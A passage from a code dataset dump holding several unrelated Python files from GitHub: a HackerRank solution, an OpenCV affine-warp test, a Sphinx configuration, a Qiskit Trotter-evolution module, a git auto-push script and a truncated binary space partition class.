tmp_a[i] = tmp_a.get(i, 0) + 1\n for key, value in tmp_a.items():\n if value==1:\n return key\n\n\n\nn = int(input().strip())\na = [int(a_temp) for a_temp in input().strip().split(' ')]\nprint(lonely_integer(a))\n","repo_name":"pensebien/intro_to_programming","sub_path":"hackerrank/lonelyint.py","file_name":"lonelyint.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"7839654321","text":"import cv2\r\nfrom skimage.external.tifffile import TiffFile\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nimage_cv2=cv2.imread(\"C:\\\\Users\\\\kylenate\\\\Desktop\\\\paper_registration1114\\\\santa_cruz_az-band7.tif\",cv2.IMREAD_UNCHANGED)\r\n\r\n\r\n\r\npts1 = np.float32([[0,0],[1000,0],[1000,1000]])\r\npts2 = np.float32([[0,np.random.randint(0,200,(1,))[0]],[np.random.randint(800,1000,(1,))[0],0],[1000,np.random.randint(800,1000,(1,))[0]]])\r\nM1 = cv2.getAffineTransform(pts1,pts2)\r\nwrap1 = cv2.warpAffine(image_cv2,M1,(1000,1000))\r\n\r\n\r\nplt.subplot(2,2,1)\r\nplt.imshow(wrap1)\r\n\r\n\r\nM2=cv2.getAffineTransform(pts2,pts1)\r\nwrap2 = cv2.warpAffine(wrap1,M2,(1000,1000))\r\n\r\nplt.subplot(2,2,2)\r\nplt.imshow(wrap2)\r\n\r\n\r\npts3 = np.float32([[0,0],[1000,0],[1000,1000]])\r\npts4 = np.float32([[0,np.random.randint(0,200,(1,))[0]],[np.random.randint(800,1000,(1,))[0],0],[1000,np.random.randint(800,1000,(1,))[0]]])\r\nM3 = cv2.getAffineTransform(pts3,pts4)\r\nwrap3 = cv2.warpAffine(wrap2,M3,(1000,1000))\r\n\r\nplt.subplot(2,2,3)\r\nplt.imshow(wrap3)\r\n\r\n\r\npts5 = pts2\r\npts6 = pts4\r\nM4 = cv2.getAffineTransform(pts6,pts5)\r\nwrap4 = cv2.warpAffine(wrap3,M4,(1000,1000))\r\n\r\n\r\nplt.subplot(2,2,4)\r\nplt.imshow(wrap4)\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"liliangzhi110/E2EIR","sub_path":"generate_affine_pre_data/wrapAffine/test_4point_random_random_landsat_256.py","file_name":"test_4point_random_random_landsat_256.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"68"} +{"seq_id":"70801051098","text":"# Configuration file for the Sphinx documentation builder.\n#\n# For the full list of built-in configuration values, see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Project information -----------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information\n\nproject = \"Posey Control\"\ncopyright = \"2023, Anthony Wertz\"\nauthor = \"Anthony Wertz\"\nrelease = \"1.2.0\"\n\n# -- General configuration ---------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration\n\nextensions = [\n \"sphinx.ext.autodoc\",\n \"sphinx.ext.napoleon\",\n \"sphinx.ext.mathjax\",\n \"sphinx.ext.autosummary\",\n \"sphinx.ext.viewcode\",\n \"sphinx_immaterial\",\n \"sphinx_immaterial.apidoc.python.apigen\",\n \"sphinx.ext.githubpages\",\n # \"sphinx_design\",\n # \"IPython.sphinxext.ipython_console_highlighting\",\n # \"IPython.sphinxext.ipython_directive\",\n # \"ipython_with_reprs\",\n]\n\ntemplates_path = [\"_templates\"]\nexclude_patterns = []\n\n\n# -- Options for HTML output -------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n#\nhtml_theme = \"sphinx_immaterial\"\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"_static\"]\n\n# html_css_files = [\n# \"extra.css\",\n# ]\n\n# # Define a custom inline Python syntax highlighting literal\n# rst_prolog = \"\"\"\n# .. role:: python(code)\n# :language: python\n# :class: highlight\n# \"\"\"\n\n# Sets the default role of `content` to :python:`content`, which uses the custom Python syntax highlighting inline literal\n# default_role = \"python\"\n\nhtml_title = \"Posey Control\"\nhtml_show_sphinx = False\n\n# Sphinx Immaterial theme options\nhtml_theme_options = {\n \"icon\": {\n \"repo\": \"fontawesome/brands/github\",\n },\n \"site_url\": \"https://github.com/SML-Posey/posey-ctrl\",\n \"repo_url\": \"https://github.com/SML-Posey/posey-ctrl\",\n \"repo_name\": \"SML-Posey/posey-ctrl\",\n \"repo_type\": \"github\",\n \"social\": [\n {\n \"icon\": \"fontawesome/brands/github\",\n \"link\": \"https://github.com/SML-Posey/posey-ctrl\",\n },\n {\n \"icon\": \"fontawesome/brands/python\",\n \"link\": \"https://pypi.org/SML-Posey/posey-ctrl\",\n },\n ],\n \"edit_uri\": \"\",\n \"globaltoc_collapse\": True,\n \"features\": [\n \"navigation.expand\",\n # \"navigation.tabs\",\n # \"toc.integrate\",\n \"navigation.sections\",\n # \"navigation.instant\",\n # \"header.autohide\",\n \"navigation.top\",\n # \"navigation.tracking\",\n # \"search.highlight\",\n \"search.share\",\n \"toc.follow\",\n \"toc.sticky\",\n \"content.tabs.link\",\n \"announce.dismiss\",\n ],\n \"palette\": [\n {\n \"media\": \"(prefers-color-scheme: light)\",\n \"scheme\": \"default\",\n \"primary\": \"light-green\",\n \"accent\": \"light-blue\",\n \"toggle\": {\n \"icon\": \"material/lightbulb-outline\",\n \"name\": \"Switch to dark mode\",\n },\n },\n {\n \"media\": \"(prefers-color-scheme: dark)\",\n \"scheme\": \"slate\",\n \"primary\": \"deep-orange\",\n \"accent\": \"lime\",\n \"toggle\": {\n \"icon\": \"material/lightbulb\",\n \"name\": \"Switch to light mode\",\n },\n },\n ],\n}\n\nhtml_last_updated_fmt = \"\"\nhtml_use_index = True\nhtml_domain_indices = True\n\n# -- Extension configuration -------------------------------------------------\n\n# Create hyperlinks to other documentation\nautodoc_default_options = {\n # \"imported-members\": True,\n \"members\": True,\n \"undoc-members\": True,\n # \"special-members\": True,\n # \"inherited-members\": \"ndarray\",\n # \"member-order\": \"groupwise\",\n}\nautodoc_typehints = \"signature\"\nautodoc_typehints_description_target = \"documented\"\nautodoc_typehints_format = \"short\"\n\n# -- Sphinx Immaterial configs -------------------------------------------------\n\n# Python apigen configuration\npython_apigen_modules = {\n \"poseyctrl\": \"poseyctrl\",\n}\npython_apigen_default_groups = [\n (\"class:.*\", \"Classes\"),\n (\"data:.*\", \"Variables\"),\n (\"function:.*\", \"Functions\"),\n (\"classmethod:.*\", \"Class methods\"),\n (\"method:.*\", \"Methods\"),\n (r\"method:.*\\.[A-Z][A-Za-z,_]*\", \"Constructors\"),\n (r\"method:.*\\.__[A-Za-z,_]*__\", \"Special methods\"),\n (r\"method:.*\\.__(init|new)__\", \"Constructors\"),\n (r\"method:.*\\.__(str|repr)__\", \"String representation\"),\n (\"property:.*\", \"Properties\"),\n (r\".*:.*\\.is_[a-z,_]*\", \"Attributes\"),\n]\npython_apigen_default_order = [\n (\"class:.*\", 10),\n (\"data:.*\", 11),\n (\"function:.*\", 12),\n (\"classmethod:.*\", 40),\n (\"method:.*\", 50),\n (r\"method:.*\\.[A-Z][A-Za-z,_]*\", 20),\n (r\"method:.*\\.__[A-Za-z,_]*__\", 28),\n (r\"method:.*\\.__(init|new)__\", 20),\n (r\"method:.*\\.__(str|repr)__\", 30),\n (\"property:.*\", 60),\n (r\".*:.*\\.is_[a-z,_]*\", 70),\n]\npython_apigen_order_tiebreaker = \"alphabetical\"\npython_apigen_case_insensitive_filesystem = False\npython_apigen_show_base_classes = True\n\n# Python domain directive configuration\npython_module_names_to_strip_from_xrefs = [\"collections.abc\"]\n\n# General API configuration\nobject_description_options = [\n (\"py:.*\", dict(include_rubrics_in_toc=True)),\n]\n\nsphinx_immaterial_custom_admonitions = [\n {\n \"name\": \"seealso\",\n \"title\": \"See also\",\n \"classes\": [\"collapsible\"],\n \"icon\": \"fontawesome/regular/eye\",\n \"override\": True,\n },\n {\n \"name\": \"star\",\n \"icon\": \"octicons/star-fill-24\",\n \"color\": (255, 233, 3), # Gold\n },\n {\n \"name\": \"fast-performance\",\n \"title\": \"Faster performance\",\n \"icon\": \"material/speedometer\",\n \"color\": (40, 167, 69), # Green: --sd-color-success\n },\n {\n \"name\": \"slow-performance\",\n \"title\": \"Slower performance\",\n \"icon\": \"material/speedometer-slow\",\n \"color\": (220, 53, 69), # Red: --sd-color-danger\n },\n]\n","repo_name":"SML-Posey/posey-ctrl","sub_path":"_docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":6524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32393460598","text":"from typing import Union, Tuple, Optional\nimport numpy as np\nfrom scipy.linalg import expm\nfrom qiskit import QuantumCircuit\nimport aqc_research.checking as chk\nimport aqc_research.utils as helper\nfrom aqc_research.circuit_transform import qcircuit_to_state, qcircuit_to_matrix\nimport aqc_research.mps_operations as mpsop\nfrom aqc_research.parametric_circuit import (\n ParametricCircuit,\n TrotterAnsatz,\n first_layer_included,\n)\n\n\nclass Trotter:\n \"\"\"\n Class for Trotter evolution of quantum states. Namely, given an input\n initial state and evolution parameters provided in constructor, the\n member functions of this class evolve the initial state forward in time\n using a Trotter circuit.\n\n By definition, a single \"Trotter step\" is a full layer of elementary\n 2-qubit Trotter blocks applied to every pair of adjacent qubits.\n In case of 2nd order Trotter, additional half-layer is implied at the end.\n \"\"\"\n\n def __init__(\n self,\n *,\n num_qubits: int,\n evol_time: float,\n num_steps: int,\n delta: float = 1.0,\n second_order: bool,\n ):\n \"\"\"\n Args:\n num_qubits: number of qubits.\n evol_time: evolution time.\n num_steps: number of Trotter steps (full layers).\n delta: parameter of corresponding Hamiltonian - scale of z-terms.\n second_order: True, if the 2nd order Trotter is intended.\n \"\"\"\n assert chk.is_int(num_qubits, num_qubits >= 2)\n assert chk.is_float(evol_time, evol_time > 0)\n assert chk.is_int(num_steps, num_steps >= 1)\n assert chk.is_float(delta, delta > 0)\n assert isinstance(second_order, bool)\n\n self._num_qubits = num_qubits\n self._evol_time = evol_time\n self._num_trotter_steps = num_steps\n self._delta = delta\n self._dt = evol_time / float(num_steps)\n self._second_order = second_order\n\n @property\n def evol_time(self) -> float:\n \"\"\"Returns the evolution time.\"\"\"\n return self._evol_time\n\n @property\n def time_step(self) -> float:\n \"\"\"Returns the time step in Trotter evolution.\"\"\"\n return self._dt\n\n @property\n def num_trotter_steps(self) -> int:\n \"\"\"Returns the number of steps (full layers) in Trotter algorithm.\"\"\"\n return self._num_trotter_steps\n\n def as_vector(self, ini_state: Union[np.ndarray, QuantumCircuit]) -> np.ndarray:\n \"\"\"\n Time evolution of an initial state by Trotter approximation.\n\n Args:\n ini_state: a full state vector or a quantum circuit that generates\n initial state from ``|0>``.\n\n Returns:\n the state: ``|state> = Trotter |ini_state>``.\n \"\"\"\n if isinstance(ini_state, np.ndarray):\n assert chk.complex_1d(ini_state)\n qc_ini = QuantumCircuit(helper.num_qubits_from_size(ini_state.size))\n else:\n assert isinstance(ini_state, QuantumCircuit)\n qc_ini = ini_state\n\n qc = trotter_circuit(\n qc=qc_ini,\n dt=self._dt,\n delta=self._delta,\n num_trotter_steps=self._num_trotter_steps,\n second_order=self._second_order,\n )\n\n if isinstance(ini_state, np.ndarray):\n state = qcircuit_to_matrix(qc) @ ini_state\n else:\n state = qcircuit_to_state(qc)\n return state\n\n def as_qcircuit(self, ini_state: QuantumCircuit) -> QuantumCircuit:\n \"\"\"\n Time evolution of an initial state by Trotter approximation. Well, it is\n not a time evolution per se, rather a circuit generation procedure. The\n latter circuit, being applied to zero state ``|0>``, can produce the\n desired result.\n\n **Note**, the ``ini_state`` circuit will be augmented by the Trotter one.\n Do *not* consider it as an immutable one.\n\n Args:\n ini_state: quantum circuit that generates initial state from ``|0>``.\n\n Returns:\n the initial quantum circuit augmented by the Trotter one.\n \"\"\"\n return trotter_circuit(\n ini_state,\n dt=self._dt,\n delta=self._delta,\n num_trotter_steps=self._num_trotter_steps,\n second_order=self._second_order,\n )\n\n def as_mps(\n self,\n ini_state: QuantumCircuit,\n trunc_thr: float = mpsop.no_truncation_threshold(),\n out_state: Optional[np.ndarray] = None,\n ) -> mpsop.QiskitMPS:\n \"\"\"\n Time evolution of initial state by Trotter approximation in MPS format.\n\n Args:\n ini_state: quantum circuit that generates initial state from ``|0>``.\n trunc_thr: truncation threshold in MPS representation.\n out_state: output array for storing state as a normal vector;\n *note*, this can be very slow and even intractable\n for a large number of qubits; useful for testing only.\n\n Returns:\n MPS data generated by Qiskit backend, possibly with state vector,\n if ``out_state`` is provided.\n \"\"\"\n qc = trotter_circuit(\n ini_state,\n dt=self._dt,\n delta=self._delta,\n num_trotter_steps=self._num_trotter_steps,\n second_order=self._second_order,\n )\n return mpsop.mps_from_circuit(qc, trunc_thr=trunc_thr, out_state=out_state)\n\n\ndef make_hamiltonian(num_qubits: int, delta: float) -> np.ndarray:\n \"\"\"\n Makes a Hamiltonian matrix. This function is used only for testing to ensure\n generated Trotterized ansatz is consistent with Hamiltonian.\n\n **Note**, here we use *half-spin* matrices.\n\n **Remark**: it turns out the bit-ordering does not matter unless\n Hamiltonian is asymmetric, which is *not* this case.\n\n Args:\n num_qubits: number of qubits.\n delta: parameter of the Hamiltonian - scaling factor of z-terms.\n\n Returns:\n Hamiltonian matrix.\n \"\"\"\n\n def _full_matrix(_s_: np.ndarray, _j_: int) -> np.ndarray:\n \"\"\"Expands a 2x2 Pauli matrix into a full one.\"\"\"\n return np.kron(np.kron(np.eye(2**_j_), _s_), np.eye(2 ** (num_qubits - _j_ - 1)))\n\n def _b2b(_i_: int) -> int:\n \"\"\"\n Bit-to-bit conversion. See the remark in the parent function doc-string.\n \"\"\"\n # return num_qubits - 1 - _i # flip bit-ordering to conform to Qiskit\n return _i_ # do nothing\n\n sigmax = np.array([[0, 1], [1, 0]])\n sigmay = np.array([[0, 0 - 1.0j], [1.0j, 0]], dtype=np.cfloat)\n sigmaz = np.array([[1, 0], [0, -1]])\n\n sx_ = [_full_matrix(sigmax, j) for j in range(num_qubits)]\n sy_ = [_full_matrix(sigmay, j) for j in range(num_qubits)]\n sz_ = [_full_matrix(sigmaz, j) for j in range(num_qubits)]\n\n rng = range(num_qubits - 1)\n sx_sx = [np.dot(sx_[_b2b(i)], sx_[_b2b(i + 1)]) for i in rng]\n sy_sy = [np.dot(sy_[_b2b(i)], sy_[_b2b(i + 1)]) for i in rng]\n sz_sz = [np.dot(sz_[_b2b(i)], sz_[_b2b(i + 1)]) for i in rng]\n\n xterms = np.sum(sx_sx, axis=0)\n yterms = np.sum(sy_sy, axis=0)\n zterms = np.sum(sz_sz, axis=0)\n\n h = -0.25 * (xterms + yterms + delta * zterms)\n return h\n\n\ndef exact_evolution(\n hamiltonian: np.ndarray,\n ini_state: Union[QuantumCircuit, np.ndarray],\n evol_time: float,\n) -> np.ndarray:\n \"\"\"\n Computes exact state evolution starting from the initial state.\n This function is used only for testing to ensure generated Trotterized\n ansatz is consistent with Hamiltonian.\n\n **Note**, might be a slow routine, suitable for debugging and testing\n with a moderate number of qubits.\n\n Args:\n hamiltonian: Hamiltonian for state evolution.\n ini_state: quantum circuit acting on the state ``|0>``\n to produce an initial one, or a corresponding quantum state.\n evol_time: evolution time.\n\n Returns:\n final state as the result of time evolution of the initial one.\n \"\"\"\n assert chk.complex_2d(hamiltonian)\n assert isinstance(ini_state, (QuantumCircuit, np.ndarray))\n assert chk.is_float(evol_time, evol_time > 0)\n\n if isinstance(ini_state, QuantumCircuit):\n ini_state = qcircuit_to_state(ini_state)\n assert chk.complex_1d(ini_state)\n assert hamiltonian.shape == (ini_state.size, ini_state.size)\n\n e_h = expm((-1.0j * evol_time) * hamiltonian)\n exact_state = np.matmul(e_h, ini_state)\n return exact_state\n\n\ndef trotter_alphas(dt: float, delta: float) -> np.ndarray:\n \"\"\"\n Computes 3 angular parameters (``alphas``) of a Trotter building block.\n\n Args:\n dt: time step in Trotter algorithm.\n delta: parameter of corresponding Hamiltonian.\n\n Returns:\n angular parameters of Trotter building block.\n \"\"\"\n assert chk.is_float(dt, dt > 0)\n assert chk.is_float(delta, delta > 0)\n\n return np.asarray([np.pi / 2 - 0.5 * delta * dt, 0.5 * dt - np.pi / 2, np.pi / 2 - 0.5 * dt])\n\n\ndef trotter_global_phase(num_qubits: int, num_steps: int, second_order: bool) -> float:\n \"\"\"\n Returns global phase of a Trotter circuit. Note, after Trotter, the global\n phase of a qcircuit instance should be incremented as follows:\n ``qcircuit.global_phase += exp(1j * (global phase))``.\n\n Args:\n num_qubits: number of qubits.\n num_steps: number of Trotter steps.\n second_order: True, if the 2nd order Trotter is intended.\n\n Returns:\n global phase of Trotter circuit.\n \"\"\"\n assert chk.is_int(num_qubits, num_qubits >= 2)\n assert chk.is_int(num_steps, num_steps >= 1)\n assert isinstance(second_order, bool)\n\n quarter_pi = 0.25 * np.pi\n phs = quarter_pi * (num_qubits - 1) * num_steps\n if second_order:\n if num_qubits % 2 == 0: # even\n # return ph + quarter_pi * (num_qubits // 2)\n return phs + quarter_pi * num_qubits\n else: # odd\n # return ph + quarter_pi * ((num_qubits - 1) // 2)\n return phs + quarter_pi * (num_qubits - 1)\n else:\n return phs\n\n\ndef trotter_circuit(\n qc: QuantumCircuit,\n *,\n dt: float,\n delta: float,\n num_trotter_steps: int,\n second_order: bool,\n) -> QuantumCircuit:\n \"\"\"\n Generates a 1st or 2nd order Trotter circuit and adds it to the input one.\n By definition, a single \"Trotter step\" is a full layer of elementary.\n 2-qubit Trotter blocks applied to every pair of adjacent qubits.\n The parameter ``num_trotter_steps`` defines the number of layers in the\n circuit. The parameter ``dt`` characterizes the evolution time per step\n (layer). The total evolution time is equal to ``dt * num_trotter_steps``.\n\n **Note**, 2nd order Trotter circuit comprises additional half-layer at the end.\n\n **Note**, currently we ignore the global phase, see the remark at the\n beginning of this script.\n\n Args:\n qc: quantum circuit to be augmented by the Trotter one.\n dt: evolution time per step (layer) in Trotter algorithm.\n delta: parameter of corresponding Hamiltonian.\n num_trotter_steps: number of Trotter steps (layers).\n second_order: True, if the 2nd order Trotter is intended.\n\n Returns:\n quantum circuit augmented by the Trotter one.\n \"\"\"\n assert isinstance(qc, QuantumCircuit) and qc.num_qubits > 0\n assert chk.is_int(num_trotter_steps, num_trotter_steps > 0)\n\n def _trotter_block(k: int, params: np.ndarray):\n qc.rz(-np.pi / 2, k + 1)\n qc.cnot(k + 1, k)\n qc.rz(params[0], k)\n qc.ry(params[1], k + 1)\n qc.cnot(k, k + 1)\n qc.ry(params[2], k + 1)\n qc.cnot(k + 1, k)\n qc.rz(np.pi / 2, k)\n\n # Compute Trotter parameters. In case of 2nd order, the first and the trail\n # half-layers should be initialized differently (\"betas\").\n alphas = trotter_alphas(dt, delta)\n betas = trotter_alphas(dt * 0.5, delta) # dt/2 (!) in first/last half-layers\n\n # Build the main part of the 1st or 2nd order Trotter circuit.\n for j in range(num_trotter_steps):\n for q in range(0, qc.num_qubits - 1, 2): # 1st half of a layer\n _trotter_block(q, betas if second_order and j == 0 else alphas)\n for q in range(1, qc.num_qubits - 1, 2): # 2nd half of a layer\n _trotter_block(q, alphas)\n\n # For 2nd order Trotter, we add an extra half-layer identical to the front one.\n if second_order:\n for q in range(0, qc.num_qubits - 1, 2):\n _trotter_block(q, betas)\n\n return qc\n\n\ndef identity_circuit(num_qubits: int) -> QuantumCircuit:\n \"\"\"\n Returns the identity (empty) quantum circuit.\n \"\"\"\n assert chk.is_int(num_qubits, num_qubits >= 2)\n return QuantumCircuit(num_qubits)\n\n\ndef neel_init_state(num_qubits: int) -> QuantumCircuit:\n \"\"\"\n Returns quantum circuit that produces the state ``|101010...>``\n (Neel state) of alternating units from the state ``|0>``.\n \"\"\"\n assert chk.is_int(num_qubits, num_qubits >= 2)\n qc = QuantumCircuit(num_qubits)\n for k in range(0, num_qubits, 2):\n qc.x(k)\n return qc\n\n\ndef half_zero_circuit(num_qubits: int) -> QuantumCircuit:\n \"\"\"\n Returns quantum circuit that produces the state ``|00...0011...11>``\n of half-zero/half-unit bits from the state ``|0>``.\n \"\"\"\n assert chk.is_int(num_qubits, num_qubits >= 2)\n qc = QuantumCircuit(num_qubits)\n for k in range(num_qubits // 2, num_qubits):\n qc.x(k)\n return qc\n\n\ndef fidelity(\n state1: Union[mpsop.QiskitMPS, np.ndarray],\n state2: Union[mpsop.QiskitMPS, np.ndarray],\n) -> float:\n \"\"\"Computes fidelity between two states, which must have the same type.\"\"\"\n if isinstance(state1, np.ndarray) and isinstance(state2, np.ndarray):\n assert chk.complex_1d(state1) and chk.complex_1d(state2)\n return float(np.abs(np.vdot(state1, state2)) ** 2)\n else:\n return float(np.abs(mpsop.mps_dot(state1, state2)) ** 2)\n\n\ndef state_difference(state1: np.ndarray, state2: np.ndarray) -> float:\n \"\"\"Computes norm of state difference. **Note**, phase factor can crucial.\"\"\"\n assert chk.complex_1d(state1) and chk.complex_1d(state2)\n return float(np.linalg.norm(state1 - state2))\n\n\ndef slice2q(\n circ: ParametricCircuit,\n vec: np.ndarray,\n *,\n layer_range: Optional[Tuple[int, int]] = None,\n) -> Tuple[np.ndarray, Tuple[int, int]]:\n \"\"\"\n Returns a slice of input vector's entries pertaining to the range of\n layers specified. Actually, a view of the vector is returned.\n\n **Note**, here ``layer`` is a collection of (num_qubit - 1) triplets of\n unit-blocks. Triplet structure of ansatz resembles (but not coincides with)\n the Trotter circuit and has 12 parameters.\n\n Args:\n circ: parametrized ansatz circuit.\n vec: vector of parameters or gradients to be sliced.\n layer_range: range of layers to get a slice of vector entries for;\n entire range is implied for the None value.\n\n Returns:\n (1) 3D array of reshaped entries of the input vector, the 1st index\n enumerates selected layers in the range, the 2nd index enumerates 2-qubit\n triplets of blocks (Trotter units), the 3rd index enumerates 1-qubit gates\n in a triplet (and corresponding entries in ``vec``).\n (2) range of layers; validated to the full range in case of None\n input value.\n \"\"\"\n if not isinstance(circ, TrotterAnsatz):\n raise ValueError(\"expects Trotterized ansatz\")\n assert isinstance(vec, np.ndarray) and vec.shape == (circ.num_thetas,)\n\n num_layers = circ.num_layers\n layer_range = (0, num_layers) if layer_range is None else layer_range\n\n assert chk.is_tuple(layer_range, len(layer_range) == 2)\n assert num_layers * circ.bpl == circ.num_blocks\n assert 0 <= layer_range[0] < layer_range[1] <= num_layers\n\n # Get a sub-set of layers, each layer consists of n-1 triplets of CX-blocks\n # with 12 (3 * 4) angular parameters in every triplet.\n vec2q = circ.subset2q(vec).reshape((num_layers, circ.num_qubits - 1, 12))\n vec2q = vec2q[layer_range[0] : layer_range[1]]\n assert np.shares_memory(vec2q.ravel(), vec) # \"vec2q\" is a view of \"vec\"\n return vec2q, layer_range\n\n\ndef init_ansatz_to_trotter(\n circ: ParametricCircuit,\n thetas: np.ndarray,\n *,\n evol_time: float,\n delta: float,\n layer_range: Optional[Tuple[int, int]] = None,\n) -> np.ndarray:\n \"\"\"\n Modifies the angular parameter ``thetas``, within specified range of layers,\n in such way that ansatz becomes equivalent the Trotter circuit. This function\n is used to generate the best possible initial vector of angular parameters\n for optimization.\n\n Args:\n circ: parametric circuit associated with this objective.\n thetas: angular parameters of the circuit.\n evol_time: evolution time; unit-block layers within ``layer_range``\n should model state evolution for that time.\n delta: parameter in corresponding Hamiltonian.\n layer_range: a couple of indices ``[from, to)`` that defines a range of\n unit-block layers to be initialized; None value implies\n a full range.\n\n Returns:\n vector of angular parameters ``thetas`` initialized to reproduce\n Trotter circuit.\n \"\"\"\n th2q, layer_range = slice2q(circ, thetas, layer_range=layer_range)\n delta_t = evol_time / float(layer_range[1] - layer_range[0])\n alphas = trotter_alphas(dt=delta_t, delta=delta)\n assert chk.float_1d(alphas, alphas.size == 3)\n assert isinstance(circ, TrotterAnsatz)\n layer_0 = first_layer_included(circ, layer_range)\n\n # If the first layer of unit-blocks is included, we set the front layer\n # of 1-qubit gates to zero. Do NOT be confused: \"front layer\" of 1-qubit\n # gates and the \"first layer\" of 2-qubit unit-blocks are different notions.\n if layer_0:\n circ.subset1q(thetas).fill(0)\n\n # Most of angular parameters are equal zero except 3 ones per block triplet.\n th2q.fill(0)\n th2q[:, :, 5] = alphas[0]\n th2q[:, :, 0] = alphas[1]\n th2q[:, :, 6] = alphas[2]\n\n # In case of the 2nd order Trotter and if the first layer is included in the\n # requested range, we initialize differently the front and trail half-layers.\n # Recall, the trailing half-layer takes exactly the same parameters as the\n # first one, although it does not present explicitly in TrotterAnsatz.\n if circ.is_second_order and layer_0:\n alphas = trotter_alphas(dt=delta_t * 0.5, delta=delta) # dt/2 (!)\n half = circ.half_layer_num_blocks // 3 # half of triplets in layer_0\n assert 3 * half == circ.half_layer_num_blocks # divisible\n th2q[0, 0:half, 5] = alphas[0]\n th2q[0, 0:half, 0] = alphas[1]\n th2q[0, 0:half, 6] = alphas[2]\n\n return thetas\n","repo_name":"qiskit-community/aqc-research","sub_path":"aqc_research/model_sp_lhs/trotter/trotter.py","file_name":"trotter.py","file_ext":"py","file_size_in_byte":18900,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"32208722214","text":"import os\nimport subprocess\nfrom datetime import datetime\n\n# 設置日誌文件的路徑\nlog_file_path = 'git_push_log.txt'\n\n# 讀取目錄清單文件\nwith open('directory_list.txt', 'r') as file:\n directories = [line.strip() for line in file]\n\n# GitHub 存儲庫 URL\nrepo_url = 'https://github.com/username/repo.git'\n\n# 提交訊息\ncommit_message = f'Auto commit at {datetime.now()}'\n\n\n# 開啟日誌文件,以附加模式('a')\nwith open(log_file_path, 'a') as log_file:\n for directory_path in directories:\n try:\n # 變換到資料夾目錄\n os.chdir(directory_path)\n\n # 執行 Git 命令\n subprocess.run(['git', 'pull'])\n subprocess.run(['git', 'add', '.'])\n subprocess.run(['git', 'commit', '-m', commit_message])\n # subprocess.run(['git', 'push', repo_url, 'master'])\n subprocess.run(['git', 'push'])\n\n # 寫入成功信息到日誌文件\n log_file.write(f'Successfully pushed changes for {directory_path}\\n')\n\n except Exception as e:\n # 寫入例外情況信息到日誌文件\n log_file.write(f'Error pushing changes for {directory_path}: {str(e)}\\n')\n\n# 提示腳本執行完成\nprint('Script execution completed.')\n \n","repo_name":"IceTeaOxO/gitTask","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"13984230456","text":"class Segment:\n\n def __init__(self, start, end):\n self.start = start\n self.end = end\n\n def split(self, other):\n A = []\n b = []\n\n # get line equations\n A.append([self.start[1] - self.end[1], self.end[0] - self.start[0]])\n A.append([other.start[1] - other.end[1], other.end[0] - other.start[0]])\n b.append(self.end[0]*self.start[1] - self.start[0]*self.end[1])\n b.append(other.end[0]*other.start[1] - other.start[0]*other.end[1])\n\n # calc determinant\n det = A[0][0]*A[1][1] - A[0][1]*A[1][0]\n if abs(det) < 0.0001:\n return None\n\n det_x = b[0]*A[1][1] - b[1]*A[0][1]\n det_y = A[0][0]*b[1] - A[1][0]*b[0]\n p = det_x/det, det_y/det\n return Segment(self.start, p), Segment(p, self.end)\n\n def facing(self, point):\n u = self.end[0] - self.start[0], self.end[1] - self.start[1]\n v = point[0] - self.start[0], point[1] - self.start[1]\n return u[0]*v[1] - u[1]*v[0]\n\n def side(self, other):\n num_front = 0\n num_behind = 0\n\n # classify each point\n if self.facing(other.start) < -0.0001:\n num_behind += 1\n elif self.facing(other.start) > 0.0001:\n num_front += 1\n\n if self.facing(other.end) < -0.0001:\n num_behind += 1\n elif self.facing(other.end) > 0.0001:\n num_front += 1\n\n if num_front == 0 and num_behind > 0:\n return \"behind\"\n elif num_behind == 0 and num_front > 0:\n return \"infront\"\n elif num_behind == 0 and num_front == 0:\n return \"coincident\"\n\n return \"spanning\"\n \n def __repr__(self):\n return \"\" % (str(self.start), str(self.end))\n\n\nclass Node:\n\n def __init__(self):\n self.segments = []\n self.left = None\n self.right = None\n\n\ndef binary_space_partition(segments):\n if len(segments) 